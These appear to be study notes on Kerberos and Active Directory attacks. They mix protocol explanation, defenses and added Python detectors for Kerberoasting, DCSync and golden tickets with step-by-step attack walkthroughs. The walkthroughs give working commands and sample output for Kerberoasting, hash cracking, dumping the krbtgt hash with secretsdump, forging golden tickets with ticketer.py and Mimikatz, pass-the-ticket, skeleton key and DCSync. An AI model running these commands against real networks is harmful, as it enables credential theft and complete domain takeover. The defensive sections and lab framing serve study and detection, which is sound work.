Kerberos

General

  • 3 Heads of Kerberos:

    • Client > TrustedServer/DC > Server

Ticket Flow

  Ticket Flow                         Example
  ----------------------------------  ------------------------------
  Request TGT >                       Apply for Driver's License >
  < TGT + SessionKey                  < Granted with Hologram
  TGT + Request to TGS >              Request to go to ABC Store >
  < ServiceTicket                     < Approved w/ ABC Hash/Ticket
  Auth to Service w/ ServiceTicket >  Going to ABC Store >

3 Long-Term Keys

  1. Client (me)

  2. Target/Service key

  3. KDC (from krbtgt acct)
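Toy model of the ticket flow and the three long-term keys above (added example, not from the original notes; the "sealing" cipher is a SHA-256/HMAC stand-in for AES/RC4 and the keys and passwords are constructed). It shows which key seals which blob: the TGT under the krbtgt key, the service ticket under the service account's key, and the client only ever touching its own key.

```python
import hashlib, hmac, json, os

def _stream(key, nonce, n):
    """Toy keystream (SHA-256 in counter mode): a teaching stand-in for AES/RC4."""
    return b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                    for i in range(n // 32 + 1))

def seal(key, obj):
    """Encrypt-and-MAC a dict under a long-term or session key."""
    nonce, plain = os.urandom(16), json.dumps(obj, sort_keys=True).encode()
    ct = bytes(p ^ s for p, s in zip(plain, _stream(key, nonce, len(plain))))
    return nonce + ct + hmac.new(key, nonce + ct, "sha256").digest()

def unseal(key, blob):
    """Decrypt; raises ValueError under any key but the one used to seal."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, "sha256").digest()):
        raise ValueError("wrong key or tampered blob")
    return json.loads(bytes(c ^ s for c, s in zip(ct, _stream(key, nonce, len(ct)))))

# The three long-term keys, derived from constructed passwords with a toy KDF.
KEYS = {
    "bob": hashlib.sha256(b"bob-pw").digest(),            # 1. client key
    "svcsqlserver": hashlib.sha256(b"svc-pw").digest(),   # 2. target/service key
    "krbtgt": hashlib.sha256(b"krbtgt-secret").digest(),  # 3. KDC key (krbtgt account)
}

def as_exchange(user):
    """Request TGT > / < TGT + SessionKey: TGT under the krbtgt key, session key copy under the client key."""
    sk = os.urandom(32).hex()
    return seal(KEYS["krbtgt"], {"user": user, "sk": sk}), seal(KEYS[user], {"sk": sk})

def tgs_exchange(tgt, spn):
    """TGT + Request to TGS > / < ServiceTicket: only the KDC opens the TGT; ticket sealed under the *service* key."""
    t = unseal(KEYS["krbtgt"], tgt)
    svc_sk = os.urandom(32).hex()
    return (seal(KEYS[spn], {"user": t["user"], "sk": svc_sk}),
            seal(bytes.fromhex(t["sk"]), {"sk": svc_sk}))

def ap_exchange(spn, ticket, authenticator):
    """Auth to Service w/ ServiceTicket >: service opens the ticket with its key, checks the authenticator."""
    t = unseal(KEYS[spn], ticket)
    return unseal(bytes.fromhex(t["sk"]), authenticator)["user"] == t["user"]

def run_flow(user="bob", spn="svcsqlserver"):  # client side: touches only its own key
    tgt, rep = as_exchange(user)
    sk = bytes.fromhex(unseal(KEYS[user], rep)["sk"])
    ticket, rep2 = tgs_exchange(tgt, spn)
    svc_sk = bytes.fromhex(unseal(sk, rep2)["sk"])
    return ap_exchange(spn, ticket, seal(svc_sk, {"user": user}))
```

Because the service ticket is sealed under the service account's key, anyone holding a ticket holds material keyed by that account's password, which is why the Defenses below push AES and long, managed passwords for SPN accounts.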

Group Policy for TGT Encryption

  • Computer Configuration > Policies > Windows Settings > Security Settings

  • > Local Policies > Security Options > "Network security: Configure encryption types allowed for Kerberos"

Attack Flow

  1. Find AD accounts with an SPN (the SPN maps a service to its service account)

  2. Request RC4 service tickets from DC

  3. Extract Service Tickets to file

  4. Offline Brute Force

Kerberoasting Targets

  1. MSSQL

  2. AGPMServer (for GPO)

  3. FIMService (Forefront Identity)

  4. STS (VMware Security Token Service)

Defenses:

  • Disable RC4 with GPO

  • Use AES instead

  • Managed Service Accounts (password rotates automatically, nothing for admins to change)

  • Protected Users - password and Kerberos keys aren't kept in LSASS memory

  • PAC validation

  • Credential Guard - NTLM hashes and Kerberos keys can't be stolen from LSASS

  • Service accounts like "sqlsvc" should not be Domain Admins

Kerberoasting

Connect to pc:
PsExec64.exe -accepteula -u bob \\$IP cmd.exe
pw-prompt: xxxx
whoami   ..bob
ipconfig ..$IP

Pull SPNs
cd \tools\ke*
> cscript.exe GetUserSPNs.vbs   ...or:
> GetUserSPNs.py -request domain/bob -dc-ip $IP > spns.output
Found 'svcsqlserver' w/RC4 (bad encryption)

Request Ticket for svcsqlserver:
C:\Tools\Kerb\powershell.exe -command "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'svcsqlserver/dc.domain.local:1433'"

Optional: grab the tickets with Mimikatz and export them to .kirbi files
cd ../mim*/x64/
mimikatz.exe
kerberos::list /export
exit

Crack the Kerb:
cd C:\Tools\Kerberoast\
python tgsrepcrack.py dictionary.txt file.kirbi
hashcat -m 13100 -a 0 spns.output /usr/local/..examp.dict

Connect:
cd c:\Tools\Sysinternals\
PsExec64.exe -accepteula -u mydom/svcsqlserver \\$IP cmd.exe
wmiexec.py mydom/svcsqlserver@10.10.10.5 whoami
pw-prompt: crackedpw
hostname .. DC
net user svcsqlserver /domain   ..part of Domain Admins, yikes!
win !!

  • Other Method:

    • Powerview > Invoke-Kerberoast
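Detection counterpart to the Attack Flow, the Defenses and the Kerberoasting lab above (added example, not from the original notes). Step 2 of the flow requests RC4 service tickets, which the DC logs as Security Event 4769 with TicketEncryptionType 0x17; the check below runs a burst rule over constructed sample events. The tuple field layout and the 300-second / 3-SPN thresholds are assumptions to tune per domain.

```python
from collections import defaultdict
from datetime import datetime

# Constructed Security Event 4769 (service ticket requested) records. Real events are
# XML; this model keeps only the fields the check uses:
# (time, requesting account, ServiceName, TicketEncryptionType, client IP)
EVENTS = [
    ("2024-01-01 10:00:01", "bob@MYDOM",   "DC01$",        "0x12", "10.10.10.50"),
    ("2024-01-01 10:00:05", "bob@MYDOM",   "svcsqlserver", "0x17", "10.10.10.50"),
    ("2024-01-01 10:00:06", "bob@MYDOM",   "agpmsvc",      "0x17", "10.10.10.50"),
    ("2024-01-01 10:00:06", "bob@MYDOM",   "fimsvc",       "0x17", "10.10.10.50"),
    ("2024-01-01 10:00:07", "bob@MYDOM",   "stssvc",       "0x17", "10.10.10.50"),
    ("2024-01-01 11:30:00", "alice@MYDOM", "svcsqlserver", "0x12", "10.10.10.60"),
    ("2024-01-01 11:31:00", "WS07$@MYDOM", "krbtgt",       "0x12", "10.10.10.70"),
]

RC4_TYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP; AES128/AES256 are 0x11/0x12
WINDOW_SECONDS = 300           # assumed tuning values
MIN_DISTINCT_SPNS = 3

def rc4_service_tickets(events):
    """Step 2 of the attack flow as the DC logs it: RC4 tickets for user service accounts.
    Computer accounts ($) and krbtgt are left out; they are not Kerberoast targets."""
    return [e for e in events
            if e[3] in RC4_TYPES and not e[2].endswith("$") and e[2] != "krbtgt"]

def kerberoast_candidates(events, window=WINDOW_SECONDS, threshold=MIN_DISTINCT_SPNS):
    """Accounts that pulled RC4 tickets for >= threshold distinct SPNs inside one window.
    A single RC4 ticket is normal on a legacy network; a burst across many SPNs is not."""
    by_user = defaultdict(list)
    for e in sorted(rc4_service_tickets(events), key=lambda e: e[0]):
        by_user[e[1]].append(e)
    flagged = {}
    for user, evs in by_user.items():
        for i, first in enumerate(evs):
            t0 = datetime.fromisoformat(first[0])
            spns = {e[2] for e in evs[i:]
                    if (datetime.fromisoformat(e[0]) - t0).total_seconds() <= window}
            if len(spns) >= threshold:
                flagged[user] = sorted(spns)
                break
    return flagged
```

Once RC4 is disabled by GPO (first bullet of the Defenses), any 0x17 in a 4769 becomes an alert on its own and the burst rule is only needed for the transition period.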

Golden Ticket

  • Impacket:

    • secretsdump.py

    • wmiexec.py

    • lookupsid.py

    • ticketer.py

Get the nthash

> secretsdump.py mydom/svcsqlserver@$IP -just-dc-user krbtgt

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:abcxyz123...:thenthashxyz1111:::
                          |
                        nthash

Get the FQDN

> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all

Windows IP Configuration
   Host Name . . . . . . . . . . . . : DC01
   Primary Dns Suffix  . . . . . . . : mydom

Get the Domain SID

> lookupsid.py mydom/svcsqlserver@$IP

Password:
[*] Brute forcing SIDs at $IP
[*] StringBinding ncacn_np:$IP[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-111122222-3333334444-5555566666

Create a golden ticket!

> ticketer.py -domain mydom -domain-sid S-1-5-21-111122222-3333334444-5555566666 -nthash thenthashxyz1111 Administrator

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for mydom/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

Abuse

  • The golden ticket - DO NOT EXECUTE !!!

  • After exporting the Administrator.ccache ticket file..

  • You can use any tool from the impacket suite like wmiexec or psexec with -k -no-pass

> export KRB5CCNAME=Administrator.ccache
> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all -k -no-pass

Mimikatz

  • Create a Golden Ticket with Mimikatz

mimikatz > kerberos::golden /krbtgt:e19xyz... /admin:root
/domain:mydom /sid:S-1-5-21.. /ticket:golden.ticket.bin
Creates "golden.ticket.bin"

Pass-the-ticket (ptt)
mimikatz > kerberos::ptt golden.ticket.bin

Skeleton Key (mimikatz)

  • Sets up a master key so the password "mimikatz" is accepted at login, alongside the real password

  • Patches the LSA process in memory

  • Requires admin rights and debug privileges

  • Memory-only: a reboot of the DC clears it

mimikatz# privilege::debug
mimikatz# misc::skeleton
Done!

DCSync (mimikatz)

  • Pulls the contents of "ntds.dit" (account hashes) via the replication protocol

  • REF: NTDS

m> lsadump::dcsync /user:administrator
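Added example (not from the original notes) for detecting the DCSync above: a DRSUAPI replication request against the domain naming context is audited as Security Event 4662 with a Control Access mask (0x100) and the replication extended-right GUIDs in Properties, provided "Audit Directory Service Access" is enabled on the DCs. The event dicts and the DC allowlist are constructed; the GUIDs are the real extended-right identifiers.

```python
# Constructed Security Event 4662 records (only the fields a DCSync check needs).
# Real 4662 events are XML with many more fields; these dicts are the example's model.
REPLICATION_RIGHTS = {  # extended-right GUIDs a replication (DRSUAPI GetNCChanges) call needs
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Accounts expected to replicate: the real DCs (constructed names). Directory sync
# accounts (e.g. an Azure AD Connect service account) belong here too or they alert every cycle.
EXPECTED_REPLICATORS = {"dc01$", "dc02$"}

EVENTS_4662 = [
    {"Time": "2024-01-01 10:00:00", "SubjectUserName": "DC02$", "ObjectName": "DC=mydom,DC=local",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"Time": "2024-01-01 10:05:00", "SubjectUserName": "svcsqlserver", "ObjectName": "DC=mydom,DC=local",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"Time": "2024-01-01 10:06:00", "SubjectUserName": "alice",
     "ObjectName": "CN=alice,OU=Users,DC=mydom,DC=local", "AccessMask": "0x20",
     "Properties": "{00000000-0000-0000-0000-00000000beef}"},  # constructed, not a replication right
]

def replication_rights_used(event):
    """Names of the replication extended rights present in the event's Properties field."""
    props = event.get("Properties", "").lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]

def dcsync_alerts(events, expected=EXPECTED_REPLICATORS):
    """Control Access (0x100) with Get-Changes-All by any account that is not a known DC.
    Get-Changes-All is the right that releases password hashes, so it is the one to key on."""
    alerts = []
    for e in events:
        if e.get("AccessMask") != "0x100":
            continue
        rights = replication_rights_used(e)
        if ("DS-Replication-Get-Changes-All" in rights
                and e["SubjectUserName"].lower() not in expected):
            alerts.append((e["Time"], e["SubjectUserName"], e["ObjectName"], rights))
    return alerts
```

Pair this with a periodic review of who actually holds those three rights on the domain head, since an account granted them quietly (as DCShadow-style changes can do) will never trip the allowlist until it replicates.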

DCShadow

  • Similar to DCSync

  • Register myself as a DC

  • Pushes the changes through replication, so it leaves almost no logging

Mimikatz GT Lab

-----------------
Start
cd \Tools\SysInternalsSuite\
PsExec64.exe -accepteula -u mydomain\svcsqlserver \\$IP cmd.exe
c:\Windows\System32  ..now on $IP!!
whoami /user  ..get the sid

-----------------
Imposter:
cd \tools\m*\x64
> mimikatz.exe
m> lsadump::dcsync /user:fakedc
.. i'm a dc named 'fakedc'
.. Creds: we got the ntlm hash

-----------------
Ticket:
m> kerberos::golden /rc4:xyzhash /user:administrator /domain:mydomain /sid:xyzsid
Created: "ticket.kirbi"

-----------------
Pass-the-ticket
\\10.10.10.10\c$ ..copy the ticket
cd \tools\m*\x64
> mimikatz.exe
kerberos::ptt c:\Users\me\Desktop\ticket.kirbi
exit
klist  ..shows the tickets

-----------------
Exploit:
From 10.10.10.10
PsExec64.exe -accepteula \\dc01 cmd.exe   ..will use the ticket for auth!
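Added example, not part of the original notes, covering the forged-TGT technique in both the impacket golden-ticket walkthrough and the Mimikatz GT Lab above: the TGT is built offline from the krbtgt hash and handed straight to the TGS, so a DC logs a service-ticket request (4769) for an account that never got a TGT issued (4768). The sample records are constructed; the 10-hour window is the default "Maximum lifetime for user ticket" domain policy.

```python
from datetime import datetime, timedelta

# Constructed 4768 (TGT issued) and 4769 (service ticket requested) records, gathered
# from every DC: (time, account, logging DC[, service]). Real events are XML; this is a model.
TGT_ISSUED_4768 = [
    ("2024-01-01 08:00:00", "bob", "DC01"),
    ("2024-01-01 08:05:00", "alice", "DC02"),
]
TGS_REQUESTED_4769 = [
    ("2024-01-01 08:01:00", "bob", "DC01", "cifs/fs01"),
    ("2024-01-01 09:10:00", "alice", "DC01", "ldap/dc01"),          # TGT came from DC02: normal
    ("2024-01-01 12:30:00", "Administrator", "DC01", "cifs/dc01"),  # no 4768 on any DC: suspect
    ("2024-01-02 07:00:00", "bob", "DC01", "cifs/fs01"),            # 23h after last TGT: suspect
]

MAX_TGT_AGE_HOURS = 10  # default "Maximum lifetime for user ticket" domain policy

def forged_tgt_suspects(tgt_events, tgs_events, max_age_hours=MAX_TGT_AGE_HOURS):
    """4769 records whose account got no 4768 from any DC in the preceding max_age_hours.
    A golden ticket is minted offline and presented straight to the TGS, so the AS
    exchange that would have logged 4768 never happened (or is older than any valid TGT)."""
    max_age = timedelta(hours=max_age_hours)
    issued = {}
    for t, acct, _dc in tgt_events:
        issued.setdefault(acct.lower(), []).append(datetime.fromisoformat(t))
    suspects = []
    for t, acct, dc, svc in tgs_events:
        when = datetime.fromisoformat(t)
        covered = [x for x in issued.get(acct.lower(), [])
                   if timedelta(0) <= when - x <= max_age]
        if not covered:
            suspects.append((acct, dc, svc, t))
    return suspects
```

TGT renewals (Event 4770) and DCs whose logs are not collected produce false positives, so feed the rule every DC's log and set the window to the domain's real ticket lifetime; rotating the krbtgt password twice invalidates any ticket already minted.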
